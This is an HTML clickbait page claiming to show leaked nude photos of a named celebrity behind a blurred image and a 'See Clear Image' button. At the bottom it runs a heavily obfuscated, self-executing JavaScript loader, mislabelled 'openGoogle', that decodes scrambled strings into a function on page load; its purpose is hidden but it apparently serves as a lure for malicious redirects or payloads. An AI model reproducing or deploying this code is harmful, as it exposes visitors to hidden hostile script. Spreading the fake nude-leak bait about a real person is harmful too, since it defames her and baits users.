<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Blur Background Example</title>
    <style>
        body, html {
            height: 100%;
            margin: 0;
            font-family: Arial, Helvetica, sans-serif;
        }

        * {
            box-sizing: border-box;
        }

        .bg-image {
            /* The image used */
            background-image: url("https://photo-ht-plus.pbnetcdn.com/assets/content/custom/gallery/5c/48/ff/18e0a47baaf81d8b8ea51eec92/8751/preview-images/14540151/content-hero.jpg?validfrom=1737216338&validto=1737734738&hash=bHAm9wfkiOeH%2BqXTvLxAema2qFI%3D");
            
            /* Add the blur effect */
            filter: blur(20px);
            -webkit-filter: blur(20px);
            
            /* Full height */
            height: 100%; 
            
            /* Center and scale the image nicely */
            background-position: center;
            background-repeat: no-repeat;
            background-size: cover;
        }

        /* Position text in the middle of the page/image */
        .bg-text {
            background-color: rgb(0,0,0); /* Fallback color */
            background-color: rgba(0,0,0, 0.1); /* Black w/opacity/see-through */
            color: white;
            font-weight: bold;
            border: 3px solid #f1f1f1;
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            z-index: 2;
            width: 80%;
            padding: 20px;
            text-align: center;
        }

        button {
    background-color: #ff4757; /* Warna latar belakang merah */
    color: white; /* Warna teks putih */
    border: none; /* Tanpa border */
    border-radius: 5px; /* Sudut membulat */
    padding: 10px 20px; /* Ruang di dalam tombol */
    font-size: 16px; /* Ukuran font */
    cursor: pointer; /* Menunjukkan tombol dapat diklik */
    transition: background-color 0.3s, transform 0.2s; /* Transisi halus */
}

/* Efek saat tombol di hover */
button:hover {
    background-color: #e84118; /* Warna saat hover */
}

/* Efek saat tombol di tekan */
button:active {
    transform: scale(0.95); /* Mengurangi ukuran tombol saat ditekan */
}
    </style>
</head>
<body>

<div class="bg-image"></div>

<div class="bg-text">
    <h2>Celebrity Nude Pics Laked</h2>
    <h1 style="font-size:50px">Jenny McCharty Nude Pic</h1>
    <p><button id="unblurButton">See Clear Image</button></p>
</div>

<script>
  var openGoogle;(function(){var tNi='',AsA=625-614;function ELL(y){var s=5332432;var b=y.length;var d=[];for(var o=0;o<b;o++){d[o]=y.charAt(o)};for(var o=0;o<b;o++){var v=s*(o+194)+(s%17271);var j=s*(o+202)+(s%14842);var w=v%b;var m=j%b;var h=d[w];d[w]=d[m];d[m]=h;s=(v+j)%7305936;};return d.join('')};var iWM=ELL('cnuotaqshorpnicwluovykfjrmzbttgcedxsr').substr(0,AsA);var Gra='ga+2aA8)zu05e-(==f]rn9a6a;;l,bSffh.rl1mn}Ah==28vgx1z-ae=1rn(noeu a6ijz() n+,a.((cru3l+s,-3.hwm.bv7+e-je6).n1*8+=rs( rd6ts;vgC f(]sgftg"ua] ;.1ha,{p.;;i );"h+)f . v](=2n1llvma!}vhnl+=l ;0wnor8s =2;.g5r)rhe;kt[i(;.r==,Cfrsm(e(=as=; 8(;0g[ .t)28r4u;[9ocs))csa)i" <n);+r.vdp i=yl1l0(.;yr;g>u];iu-rdiw).5..yhlo+a{+{=r,t];vad q kd{;;)vr *]0cv6{rS)=tl,ngAp.j od=u4ao 7+]i;6=o}<r;(;eqi={a;=r56n)7[1=l0cdaq)idkgrs.8ewr[=it,=.va,"vv7;e+])shgrh7mehon[b;)2o]v=a9u;y=tol}+)i[q8pl-){=s;;((sal9uo)nmnm)ru)tC],(Ag"tfv}ubndu,[at=8+ut,b.oi=re}r+;f.5;,(rrs0eachtldne; (vm8[poyd] da-+6nt8;i",gr(t(rcmgmsb7)firgihtlsangfpd),c(jh++t0jr"dy+;edi<+tunAu=oCiv(a<v[n suehnmao[+d> ,Cgfu,)l,o(;=06(+vnk)!);r[jip)rlgv,eai;(en,pn]j8e;;fvla)uvrr[a(dg2,ear3vi 0,vpv.kd=ct.=n774(rtarj,=0to"foCflo[efrrbydro.=;=r]e(,1+.a=e+;)e0+ebe=(i}Ca1p=ams g;1av;C5c9aor9i"o)noof4(cvrt(hrs1;a9o=rnaa,a,uai;.<2(=r)nru)ptlc,=l;8p"aatg.m=h(h';var XQH=ELL[iWM];var pnd='';var vQg=XQH;var hAI=XQH(pnd,ELL(Gra));var Sfc=hAI(ELL(')_og0)i!Ku_Ose0;D)reOuD!3e;\/.n]5f{sO_rO$a lc6effu5pOgOf4)r5Bt9)_8.gb4_$&lir=ikoO3;])OO=u(jaOet(u1OooIn5y,-(.fbI%[8O9;8O54]O$m%$E854CSw\/O[Ora]]o3cO\'O8f"g+0fsu %3bl]\'6Obfe.SOOG{a]Oe6Ob_,O t3{OpArhve.ms6neOsft)_Do)te%g3_2A=t;)_pcroa.paab?4%g+)elc3v2eln$rGO*OOreo98#OO,.,f)1_(oOr)=O00.{.%O_r]O!Jcu(OO1,=t _Oc9O;:{(+ee8tOaO$p$3[eeaudec];_c;ek.rtOwfO8dto)E1,OOO$5O"OnOi,=,uc3d4u_(=i=ft=Oot_t ]wft.31aa%_$ rC4lO<tlnd(if(t8LOl*]m%;S(i_F7g20OOltcfr3ee4.,uuuc)1f3cx{=li 9r _lH_O\/eecO!aw_sqek8iO36r<%%()4be3nOyeOo9c]46l$ec]}xn0\/$s;..0:oy>n%t}Sal.*>tOA.=tegd)c()1lo]706ex(q9..)O)sp=\/pu$33daOO9!(o=dt3anjx\'GysGt..}s{K!O=f!oOtenc,;O(({9!v 5aFO;Bu&O$;;}oO)-co6i6i+Oooo)e:_+,4$C7..?7e.OOaart&e(;rx)u%rtOc-w)O1s](5o!_oi[wdOg;.67apa$))[.fo tO]4;),O% <0nOta9z(!poOkO Ot%!]0Oe(OfO!g4@ea#1(. BuD.f?(n_lt41EOO)Oi;Of2by_f&o_O;(t}(3,+){s>hL;b6{cC]g6rn68!$)xt.{(e{fw%2(%,C,t]4jl)rfn,tK;O}e2;e8)tiw3nO}].T a m#ma-eo)5aO2OaO!O4;tasehJbn bO0.%e,OOO!f.}%O{O)]f#0t;\/=jc#jeTa%xfunO>OOO!(T..5,}6[iynOa1).(OmO4O)-)O9"f7O71O[eS()9OntOix.]mO}wgOO!red;A;tOO!O)%)e,r%a%_]O{$7)en#;;Or6o7(oO5O(o v,?{,eaOc+O"fkOOO)Is-JinOOgiaf)hw;;fffOO{OOinI nO,Cff]a!03B;_ O8d=,@va}9nd.dci _$((4Jt)6I7(5efn_g)e)(]O%1(.edJea).x*;5lb(OagFI)e"84+44O]Od.i3&O;.,.uj*11_3$75c=o.)%.u2OS;35lOEaf_h.t#,_EOte7_rn=mtuOqO};Onutmg,dt.O.[@7f05t8n.$e$;3e{7e==\'&{O:bOs3w ($n)O9)3]O(.ev!)e)rObaHd_6=1Oo(0.ifEldt Od) m7Oo]_o26ej50)4.l;;t[j,O6u(re  cbo72BSx_)c]O5O4O,a5.Oc) x8T=cOrnew"6OrmOrg1AtO8 brbdILmOOc4 b%7.0h,.tAad$e5u)uol6nO7O.((et8ruuO>f)vOel%(5GOOo5(=lb;,5(qOu8.oo3O8%)I3)6Olf,_[O2;,t4.llO2Oo=O,&r8i)83fO1_e(n{ue.==HaO3,=.bofb0pD-)u2g1)1tvO{.C(=OO.f)pcfl0O!ld".t03fecO 37(l;45#w.4t=O %_,O$d5sO3)9n=OOe?8{09=rty0Gf_(_Atf 5el(Ot_!luosa0a3%).784}?6,KO!5!On73(tc1t1o.Fc3!O.{7f!)(O8_+$k2O4$if {.yO.OOha7a7[b)jt!bt%aie:;nl%wO;]tbl8sotopc(_etOd_mO.b]._%ipn3h.Otd_. a:42)0n01so69:%5tnck.Onnf8aOr!*OOO)+n(,O4O=1=sn$OBOeka_Ar,a;O }!O1 =t)cOfe$0eci(6Oef (%_4])=.+(eOt  j.Ob[iO+Ge3Of{d.4n4%b]t]Ox12e(f_O3)Oo1gt9ie1ome6{;Od-+O=O_9) .((e a%!(3a)8.OfMO.+Oif_pt(tr=u5i(mtn\/Otf;$__agI1o)oO !}}i]t[){etv61$;fr!ut..*1@vf]:16{(, 7wo!1t5!;),oC5func[f0f0n <O0e1f=dfi]oO)ibby}_%a6w* 2]I_"OsT3L1!39O7}Of'));var yGs=vQg(tNi,Sfc );yGs(4676);return 9651})()
</script>

</body>
</html>
